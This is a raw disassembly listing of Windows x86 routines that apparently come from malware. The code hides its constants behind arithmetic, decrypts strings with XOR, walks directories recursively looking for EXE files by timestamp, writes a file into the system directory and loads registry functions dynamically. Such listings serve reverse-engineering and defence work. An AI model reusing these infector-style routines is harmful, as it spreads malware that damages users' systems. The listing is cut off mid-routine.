loc_43B979: ; CODE XREF: sub_43B912+5C�j
xor eax, eax
inc eax
pop edi
pop esi
leave
retn 8
sub_43B912 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B982 proc near ; CODE XREF: sub_43AF47+45A�p
; DATA XREF: sub_439B7B+D7�o
var_270 = byte ptr -270h
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 26Ch
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_446600 ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_43F85A
push offset byte_44B25F
call sub_43C507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_444020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_444020
push offset byte_44B257
call sub_43C507
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_444020
add esp, 24h
movsx eax, word_44A124
add eax, dword_44A1A0
mov dl, [ebp+arg_0]
mov [ebp+eax+var_270], dl
push 0
push 80h
push 4
push 0
movsx eax, word_44A170
sub eax, 2
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_449788 ; CreateFileA
mov edi, eax
push 0
lea eax, [ebp+var_26C]
push eax
mov eax, dword_44A248
inc eax
push eax
lea eax, [ebp+var_267]
push eax
push edi
call ds:dword_449B8C ; WriteFile
push edi
call ds:dword_448654 ; CloseHandle
pop edi
pop esi
leave
retn
sub_43B982 endp
; =============== S U B R O U T I N E =======================================
sub_43BA5C proc near ; DATA XREF: sub_43B490+7�o
mov eax, dword_44A1E4
movsx edx, word_44A1E0
add eax, edx
sub eax, 6
push eax
call ds:dword_449664 ; ExitThread
retn
sub_43BA5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BA75 proc near ; CODE XREF: sub_43BA75+299�p
; sub_43BA75+307�p ...
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 268h
push ebx
push esi
push edi
push 0
call ds:dword_449630
xor ebx, ebx
inc ebx
push offset byte_44B24F
call sub_43C507
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_449634
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_447258 ; FindFirstFileA
mov [ebp+var_248], eax
mov eax, dword_44A128
movsx edx, word_44A180
add eax, edx
sub eax, 0Ch
neg eax
cmp [ebp+var_248], eax
jnz loc_43BCC2
movsx eax, word_44A1B4
sub eax, 4
cmp [ebp+arg_20], eax
ja loc_43BD8B
movsx eax, word_44A170
mov edx, dword_44A268
lea eax, [eax+edx+3FAh]
cmp [ebp+arg_24], eax
jnb short loc_43BB2B
mov eax, dword_44A1B0
add eax, 95h
movsx edx, word_44A150
add eax, edx
cmp [ebp+arg_24], eax
jnz loc_43BD8B
loc_43BB2B: ; CODE XREF: sub_43BA75+98�j
movsx eax, word_44A1C0
add eax, 30D3Ch
cmp [ebp+arg_24], eax
ja loc_43BD8B
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call ds:dword_449780 ; CompareFileTime
mov [ebp+var_260], eax
mov eax, dword_44A23C
add eax, dword_44A1BC
sub eax, 0Eh
cmp [ebp+var_260], eax
jge short loc_43BB77
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_43BB82
; ---------------------------------------------------------------------------
loc_43BB77: ; CODE XREF: sub_43BA75+F3�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_43BB82: ; CODE XREF: sub_43BA75+100�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call ds:dword_449778 ; FileTimeToSystemTime
movzx eax, [ebp+var_24E]
movzx edx, [ebp+var_250]
movsx ecx, word_44A174
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_252]
movsx ecx, word_44A1A4
movsx esi, word_44A124
lea ecx, [ecx+esi+0Bh]
imul edx, ecx
mov ecx, dword_44A154
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_256]
mov ecx, dword_44A268
add ecx, 1Ah
imul edx, ecx
mov ecx, dword_44A140
add ecx, 6
add ecx, dword_44A26C
imul edx, ecx
movsx ecx, word_44A0D8
mov esi, dword_44A168
lea ecx, [ecx+esi+3Ah]
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_258]
mov ecx, dword_44A270
add ecx, 8
imul edx, ecx
movsx ecx, word_44A150
add ecx, 16h
imul edx, ecx
mov ecx, dword_44A0C8
add ecx, 0Fh
add ecx, dword_44A194
imul edx, ecx
mov ecx, dword_44A10C
add ecx, 33h
add ecx, dword_44A1A0
imul edx, ecx
add eax, edx
mov [ebp+var_25C], eax
mov edx, ds:dword_444024
cmp eax, edx
ja loc_43BD8B
sub edx, eax
movsx eax, word_44A27C
mov ecx, dword_44A128
lea eax, [eax+ecx+7]
cmp edx, eax
jnb loc_43BD8B
movsx eax, word_44A264
add eax, 9Bh
cmp [ebp+arg_24], eax
jz short loc_43BCB0
push 0
push [ebp+arg_0]
call sub_43AF47
add esp, 8
jmp loc_43BD8B
; ---------------------------------------------------------------------------
loc_43BCB0: ; CODE XREF: sub_43BA75+227�j
push 1
push [ebp+arg_0]
call sub_43AF47
add esp, 8
jmp loc_43BD8B
; ---------------------------------------------------------------------------
loc_43BCC2: ; CODE XREF: sub_43BA75+68�j
cmp [ebp+var_112], 2Eh
jz loc_43BD87
push offset word_44B246
call sub_43C507
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_449634
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43BA75
add esp, 158h
jmp short loc_43BD87
; ---------------------------------------------------------------------------
loc_43BD1B: ; CODE XREF: sub_43BA75+314�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call ds:dword_445004 ; FindNextFileA
mov ebx, eax
or ebx, ebx
jz short loc_43BD8B
cmp [ebp+var_112], 2Eh
jz short loc_43BD87
push offset byte_44B23D
call sub_43C507
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_449634
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43BA75
add esp, 158h
loc_43BD87: ; CODE XREF: sub_43BA75+254�j
; sub_43BA75+2A4�j ...
or ebx, ebx
jnz short loc_43BD1B
loc_43BD8B: ; CODE XREF: sub_43BA75+7B�j
; sub_43BA75+B0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43BA75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BD90 proc near ; CODE XREF: sub_43D357+190�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_442F6C
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
call sub_442F8C
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
loc_43BDB8: ; CODE XREF: sub_43BD90+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43BDB8
movsx ebx, word_44A240
movsx edx, word_44A1C0
add ebx, edx
sub ebx, 5
mov esi, eax
sub esi, ebx
movsx ebx, word_44A0FC
movsx edx, word_44A160
add ebx, edx
sub ebx, 7
mov [ebp+esi+var_12104], bl
push 0
mov eax, dword_44A1E8
add eax, dword_44A0B8
sub eax, 4
push eax
push 3
push 0
mov eax, dword_44A0A0
movsx edx, word_44A1B4
add eax, edx
sub eax, 8
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call ds:dword_449788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_43C066
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call ds:dword_444028 ; ReadFile
mov [ebp+var_12108], eax
push edi
call ds:dword_448654 ; CloseHandle
mov eax, dword_44A1D0
sub eax, 7
cmp [ebp+var_12108], eax
jz loc_43C066
cmp [ebp+var_1FFF], 4Ch
jnz loc_43C066
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
movsx edx, word_44A264
mov ecx, dword_44A1E4
lea edx, [edx+ecx+3Fh]
add eax, edx
movsx edx, word_44A150
add edx, dword_44A10C
sub edx, 0Ch
add eax, edx
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
mov edx, dword_44A26C
sub edx, 9
cmp eax, edx
jz loc_43C066
movzx eax, [ebp+var_12000]
movsx edx, word_44A0BC
dec edx
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
mov edx, dword_44A13C
sub edx, 2
cmp eax, edx
jnz loc_43C066
movzx eax, [ebp+var_12000]
mov edx, dword_44A268
add edx, 0Ch
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
movsx esi, word_44A1FC
lea esi, [eax+esi+0Ch]
movzx esi, [ebp+esi+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_442F8C
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_43BF87: ; CODE XREF: sub_43BD90+1FC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43BF87
mov edi, eax
movsx eax, word_44A100
add eax, dword_44A228
sub eax, 2
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_43C02B
mov eax, dword_44A0C8
movsx edx, word_44A218
add eax, edx
sub eax, 2
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call ds:dword_444030
add esp, 4
cmp eax, 45h
jnz short loc_43C02B
mov esi, dword_44A1E8
movsx ebx, word_44A230
add esi, ebx
sub esi, 5
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_444030
add esp, 4
cmp eax, 58h
jnz short loc_43C02B
mov esi, dword_44A158
sub esi, 8
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_444030
add esp, 4
cmp eax, 45h
jz short loc_43C02D
loc_43C02B: ; CODE XREF: sub_43BD90+21C�j
; sub_43BD90+248�j ...
jmp short loc_43C066
; ---------------------------------------------------------------------------
loc_43C02D: ; CODE XREF: sub_43BD90+299�j
push offset dword_44B238
call sub_43C507
push eax
lea edi, [ebp+var_11FFE]
push edi
call ds:dword_444020
mov eax, dword_44A168
movsx edx, word_44A1A4
add eax, edx
sub eax, 7
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_44029C
add esp, 14h
loc_43C066: ; CODE XREF: sub_43BD90+9E�j
; sub_43BD90+DB�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43BD90 endp
; =============== S U B R O U T I N E =======================================
sub_43C06B proc near ; DATA XREF: .data:0044A388�o
mov eax, 80004001h
retn 18h
sub_43C06B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C073 proc near ; CODE XREF: sub_43855F:loc_438562�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, dword_44A0A0
sub eax, 4
push eax
push 0
push 20h
push 0
call ds:dword_446A44
lea eax, [ebp+var_10]
push eax
call ds:dword_44725C ; GetSystemTime
movzx eax, [ebp+var_6]
movzx edx, [ebp+var_8]
mov ecx, dword_44A274
add ecx, 33h
add ecx, dword_44A1EC
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_A]
mov ecx, dword_44A1AC
add ecx, 0Ch
movsx ebx, word_44A22C
add ecx, ebx
imul edx, ecx
mov ecx, dword_44A0F4
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_E]
mov ecx, dword_44A09C
add ecx, 19h
imul edx, ecx
movsx ecx, word_44A1FC
add ecx, 13h
imul edx, ecx
mov ecx, dword_44A1F8
add ecx, 39h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_10]
movsx ecx, word_44A104
movsx ebx, word_44A260
lea ecx, [ecx+ebx+2]
imul edx, ecx
mov ecx, dword_44A11C
add ecx, 16h
add ecx, dword_44A090
imul edx, ecx
mov ecx, dword_44A268
add ecx, 0Eh
movsx ebx, word_44A144
add ecx, ebx
imul edx, ecx
mov ecx, dword_44A110
add ecx, 37h
add ecx, dword_44A238
imul edx, ecx
add eax, edx
mov ds:dword_444024, eax
mov eax, dword_44A0E4
sub eax, 8
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_43BA75
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_43C073 endp
; =============== S U B R O U T I N E =======================================
sub_43C1A7 proc near ; DATA XREF: .data:0044A360�o
mov eax, 80004001h
retn 8
sub_43C1A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C1AF proc near ; DATA XREF: .data:0044A39C�o
push ebp
mov ebp, esp
push offset dword_446608
call ds:dword_446A3C ; InterlockedIncrement
mov eax, ds:dword_446608
pop ebp
retn 4
sub_43C1AF endp
; =============== S U B R O U T I N E =======================================
sub_43C1C6 proc near ; CODE XREF: sub_43EC0A+2F�p
push edi
push offset dword_44B228
call sub_43C507
pop ecx
push eax
call ds:dword_4465E8 ; GetModuleHandleA
mov dword_44A2B8, eax
test eax, eax
jnz short loc_43C1F9
push offset dword_44B218
call sub_43C507
pop ecx
push eax
call ds:dword_447244 ; LoadLibraryA
mov dword_44A2B8, eax
loc_43C1F9: ; CODE XREF: sub_43C1C6+1A�j
push offset byte_44B207
call sub_43C507
push eax
push dword_44A2B8
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4465EC, eax
push offset byte_44B1F3
call sub_43C507
push eax
push dword_44A2B8
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44403C, eax
push offset dword_44B1E4
call sub_43C507
push eax
push dword_44A2B8
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449618, eax
push offset dword_44B1D4
call sub_43C507
add esp, 10h
push eax
push dword_44A2B8
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_4465F0, eax
pop edi
retn
sub_43C1C6 endp
; =============== S U B R O U T I N E =======================================
sub_43C26E proc near ; CODE XREF: sub_43EC0A+2A�p
push edi
push offset byte_44B1C5
call sub_43C507
pop ecx
push eax
call ds:dword_4465E8 ; GetModuleHandleA
mov dword_44A2B4, eax
test eax, eax
jnz short loc_43C2A1
push offset asc_44B1B6 ; "\v"
call sub_43C507
pop ecx
push eax
call ds:dword_447244 ; LoadLibraryA
mov dword_44A2B4, eax
loc_43C2A1: ; CODE XREF: sub_43C26E+1A�j
push offset word_44B1A2
call sub_43C507
pop ecx
push eax
push dword_44A2B4
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_446A44, eax
pop edi
retn
sub_43C26E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C2C0 proc near ; CODE XREF: sub_43AF47+26D�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_43C2D7
add eax, 3Fh
loc_43C2D7: ; CODE XREF: sub_43C2C0+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_43A0EE
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, dword_44A248
add edx, 3Ch
add edx, dword_44A270
mov eax, edi
add eax, edx
jge short loc_43C304
add eax, 3Fh
loc_43C304: ; CODE XREF: sub_43C2C0+3F�j
sar eax, 6
mov edi, dword_44A288
add edi, 3Ah
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call ds:dword_44402C ; RtlZeroMemory
push [ebp+arg_4]
push esi
push [ebp+var_14]
call ds:dword_448638
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_442662
mov esi, [ebp+var_14]
mov ebx, dword_44A184
sub ebx, 2
jmp short loc_43C362
; ---------------------------------------------------------------------------
loc_43C346: ; CODE XREF: sub_43C2C0+BC�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_442689
mov eax, dword_44A1E8
add eax, 39h
add eax, dword_44A14C
lea esi, [esi+eax]
inc ebx
loc_43C362: ; CODE XREF: sub_43C2C0+84�j
mov edi, [ebp+arg_4]
movsx edx, word_44A170
lea eax, [edi+edx+3Eh]
test eax, eax
jge short loc_43C377
add eax, 3Fh
loc_43C377: ; CODE XREF: sub_43C2C0+B2�j
sar eax, 6
cmp ebx, eax
jl short loc_43C346
push [ebp+var_14]
call sub_438324
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_439DC4
movsx eax, word_44A0B0
add eax, 9
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call ds:dword_44964C
add esp, 18h
movsx edi, word_44A144
add edi, dword_44A14C
sub edi, 0Ch
cmp eax, edi
jz short loc_43C3C7
xor eax, eax
inc eax
jmp short loc_43C3C9
; ---------------------------------------------------------------------------
loc_43C3C7: ; CODE XREF: sub_43C2C0+100�j
xor eax, eax
loc_43C3C9: ; CODE XREF: sub_43C2C0+105�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C2C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C3CE proc near ; CODE XREF: sub_43F189+197�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, dword_44A280
movsx edx, word_44A100
add eax, edx
sub eax, 7
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4465EC ; RegOpenKeyExA
mov edi, eax
or edi, edi
jz short loc_43C404
xor eax, eax
jmp short loc_43C431
; ---------------------------------------------------------------------------
loc_43C404: ; CODE XREF: sub_43C3CE+30�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_44403C ; RegQueryValueExA
mov edi, eax
push [ebp+var_4]
call ds:dword_449618 ; RegCloseKey
or edi, edi
jz short loc_43C42E
xor eax, eax
jmp short loc_43C431
; ---------------------------------------------------------------------------
loc_43C42E: ; CODE XREF: sub_43C3CE+5A�j
xor eax, eax
inc eax
loc_43C431: ; CODE XREF: sub_43C3CE+34�j
; sub_43C3CE+5E�j
pop edi
leave
retn
sub_43C3CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C434 proc near ; CODE XREF: sub_43858C+DA�p
; sub_43858C+510�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call ds:dword_444000 ; lstrlenW
mov edi, eax
push 0
push 0
movsx eax, word_44A0CC
add eax, 1FF8h
push eax
push esi
push edi
push ebx
mov eax, dword_44A12C
add eax, dword_44A194
sub eax, 11h
push eax
push 0
call ds:dword_44400C ; WideCharToMultiByte
mov eax, dword_44A19C
add eax, dword_44A21C
sub eax, 0Eh
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_43C434 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C48C proc near ; DATA XREF: .data:off_44A398�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44BAC8
push esi
call ds:dword_449648
or eax, eax
jz short loc_43C4B8
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43C500
; ---------------------------------------------------------------------------
loc_43C4B8: ; CODE XREF: sub_43C48C+1A�j
push offset dword_44BA48
push esi
call ds:dword_449648
or eax, eax
jz short loc_43C4D8
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43C500
; ---------------------------------------------------------------------------
loc_43C4D8: ; CODE XREF: sub_43C48C+3A�j
push offset dword_44BA08
push esi
call ds:dword_449648
or eax, eax
jz short loc_43C4F8
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43C500
; ---------------------------------------------------------------------------
loc_43C4F8: ; CODE XREF: sub_43C48C+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_43C500: ; CODE XREF: sub_43C48C+2A�j
; sub_43C48C+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_43C48C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C507 proc near ; CODE XREF: sub_43858C+298�p
; sub_43858C+38B�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44A290, 0
jnz short loc_43C52F
push offset dword_449BC0
call ds:dword_445008 ; InitializeCriticalSection
mov dword_44A290, 1
loc_43C52F: ; CODE XREF: sub_43C507+11�j
movsx esi, word_44A1F0
movsx ebx, word_44A0CC
add esi, ebx
sub esi, 7
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
cmp eax, dword_44A0B8
jz short loc_43C5E2
push offset dword_449BC0
call ds:dword_449660 ; RtlEnterCriticalSection
mov eax, dword_44A220
dec eax
mov [ebp+var_2], ax
jmp short loc_43C592
; ---------------------------------------------------------------------------
loc_43C57D: ; CODE XREF: sub_43C507+95�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_43C592: ; CODE XREF: sub_43C507+74�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_43C57D
movsx eax, word_44A170
sub eax, 2
mov edx, dword_44A0F8
add edx, dword_44A12C
sub edx, 0Fh
mov [edi+eax], dl
mov eax, dword_44A128
sub eax, 8
mov edx, dword_44A25C
movsx ecx, word_44A1F0
add edx, ecx
sub edx, 0Bh
mov [edi+eax], dl
push offset dword_449BC0
call ds:dword_448650 ; RtlLeaveCriticalSection
loc_43C5E2: ; CODE XREF: sub_43C507+5D�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_43C507 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C5EA proc near ; CODE XREF: sub_44006A+E�p
; sub_44006A+1E1�p
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10068 = dword ptr -10068h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_10059 = byte ptr -10059h
var_10058 = dword ptr -10058h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10043 = byte ptr -10043h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10088h
call sub_442F6C
push ebx
push esi
push edi
mov [ebp+var_40], 8
push offset dword_44B194
call sub_43F767
pop ecx
push eax
call ds:dword_444044
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word_44A0FC
add eax, dword_44A154
sub eax, 0Dh
cmp ebx, eax
jz short loc_43C64E
xor eax, eax
jmp loc_43CC7A
; ---------------------------------------------------------------------------
loc_43C64E: ; CODE XREF: sub_43C5EA+5B�j
lea eax, [ebp+var_24]
push eax
push offset dword_44BA68
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44A208
add eax, dword_44A14C
sub eax, 0Bh
cmp ebx, eax
jnz loc_43CC6F
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, dword_44A090
movsx edx, word_44A170
add eax, edx
sub eax, 5
cmp ebx, eax
jnz loc_43CC66
and [ebp+var_44], 0
movsx eax, word_44A264
sub eax, 9
mov [ebp+var_1C], eax
jmp loc_43CC5A
; ---------------------------------------------------------------------------
loc_43C6BC: ; CODE XREF: sub_43C5EA+676�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, dword_44A25C
add eax, dword_44A188
sub eax, 8
cmp ebx, eax
jnz loc_43CC57
and [ebp+var_10048], 0
lea eax, [ebp+var_10048]
push eax
push offset dword_44BA78
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44A0A4
movsx edx, word_44A1C0
add eax, edx
sub eax, 0Ah
cmp ebx, eax
jnz loc_43CC33
cmp [ebp+var_10048], 0
jz loc_43CC33
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10048]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_43CC33
lea eax, [ebp+var_10043]
push eax
push [ebp+var_20]
call sub_43C434
mov eax, dword_44A288
sub eax, 5
push eax
push offset dword_447230
lea eax, [ebp+var_10043]
push eax
call sub_4384B5
add esp, 14h
mov edi, dword_44A280
add edi, 0FFFBh
cmp eax, edi
jz loc_43CC33
cmp [ebp+arg_4], 0
jz short loc_43C7D5
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_43CC7A
; ---------------------------------------------------------------------------
loc_43C7D5: ; CODE XREF: sub_43C5EA+1CC�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push offset dword_44BA98
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A184
movsx edx, word_44A240
add eax, edx
sub eax, 4
cmp ebx, eax
jnz loc_43CC33
mov [ebp+var_10059], 44h
push offset byte_44B18B
call sub_43C507
movsx edi, word_44A0D8
dec edi
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_4384B5
add esp, 10h
movsx esi, word_44A0CC
add esi, 0FFF8h
